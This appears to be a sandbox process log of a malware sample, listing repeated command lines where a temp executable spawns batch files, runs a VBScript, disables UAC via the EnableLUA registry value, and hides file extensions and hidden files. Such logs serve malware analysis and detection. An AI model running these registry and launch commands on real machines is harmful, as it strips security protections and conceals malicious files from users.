C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\xEwwQQcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ImwgEooc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OWUIAQII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\sGYkEAEI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QQcIcwIk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fKYskIkM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\nQIAccck.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GQYEAoQc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\YIoEoEAo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\sugUYEMM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eqgkcskY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IasgAkoA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SogwUgwc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NAsEckUQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HqkIAssQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BeMEQIIA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XucokIkQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\haYMAUMk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zyIYQEwo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OaMoEUAU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cUgkQEkM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OSIAwcUo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UsQwUQEw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GKkYYwYU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\YGkcEsMs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\yYgkEAgY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gKAYUcEI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QwgEsQgQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\bWYEcAMM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LGUUYAYo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

